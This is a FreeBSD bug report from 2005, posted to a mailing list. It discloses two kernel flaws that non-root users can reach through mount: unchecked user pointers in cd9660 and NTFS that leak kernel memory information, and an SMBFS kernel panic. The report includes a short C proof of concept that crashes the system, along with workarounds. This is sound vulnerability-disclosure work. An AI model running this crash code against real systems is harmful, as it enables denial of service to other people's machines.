kern/87010: Reading kernel memory & pagefault under non-root
Alexander Drozdov
dzal_mail at mtu-net.ru
Thu Oct 6 12:50:14 PDT 2005
>Number: 87010
>Category: kern
>Synopsis: Reading kernel memory & pagefault under non-root
>Confidential: no
>Severity: critical
>Priority: medium
>Responsible: freebsd-bugs
>State: open
>Quarter:
>Keywords:
>Date-Required:
>Class: sw-bug
>Submitter-Id: current-users
>Arrival-Date: Thu Oct 06 19:50:12 GMT 2005
>Closed-Date:
>Last-Modified:
>Originator: Alexander Drozdov
>Release: 5.4-RELEASE-p6
>Organization:
>Environment:
FreeBSD sorcerer.my.domain 5.4-RELEASE-p6 FreeBSD 5.4-RELEASE-p6 #9: Thu Jul 28 09:55:49 MSD 2005 sorcerer at sorcerer.my.domain:/usr/obj/usr/src/sys/MYKERNEL_3 i386
>Description:
2 problems:
1. It is possible to pass to kernel addresses that can not be located
in user space. There are no write operations to these addresses but
there are strcmp operations with some in-kernel buffers. It allows
user to get some information about kernel memory.
Look at /usr/src/sys/isofs/cd9660/cd9660_vfsops.c:478
cd9660_iconv->open(argp->cs_local, argp->cs_disk, &isomp->im_d2l);
cd9660_iconv->open(argp->cs_disk, argp->cs_local, &isomp->im_l2d);
Variables argp->cs_local and argp->cs_disk are the pointers that
user passed to the kernel through mount call. 'open' function
(/usr/src/sys/libkern/iconv.c) just uses strcmp function to
compare these pointers with the charset encodings.
NTFS module (/usr/src/sys/fs/ntfs) has the same behaviour. But, for
example, msdosfs has not: 'copyinstr' function has been called before
using the same buffers.
Workaround: disallow non-root users to mount filesystems (sysctl
vfs.usermount=0) OR compile kernel without static cd9660 and ntfs
modules and do not load these modules via kldload. I have no
information about working this vulnerability in jail.
2. The result of the program below is kernel panic. I just passed a bad
but existed file descriptor (0) to SMBFS module through mount call.
#include <sys/param.h>
#include <sys/mount.h>
#include <errno.h>
struct smbfs_args {
int version;
int dev;
u_int flags;
char mount_point[MAXPATHLEN];
u_char root_path[512+1];
uid_t uid;
gid_t gid;
mode_t file_mode;
mode_t dir_mode;
int caseopt;
};
int main(int argc, char *argv[])
{
int ret;
struct smbfs_args ia;
memset(&ia,0xff,sizeof(ia));
ia.version=101012;
ia.dev=0;
ret=mount("smbfs","tmp",MNT_RDONLY,&ia);
if(!ret)
printf("Ok!\n");
else
printf("result = %i, errno = %i, %s\n", ret, errno,
strerror(errno));
return 0;
}
Workaround: disallow non-root users to mount filesystems (sysctl
vfs.usermount=0) OR compile kernel without static smbfs module
and do not load this module via kldload. I have no information
about working this vulnerability in jail.
>How-To-Repeat:
>Fix:
>Release-Note:
>Audit-Trail:
>Unformatted:
More information about the freebsd-bugs
mailing list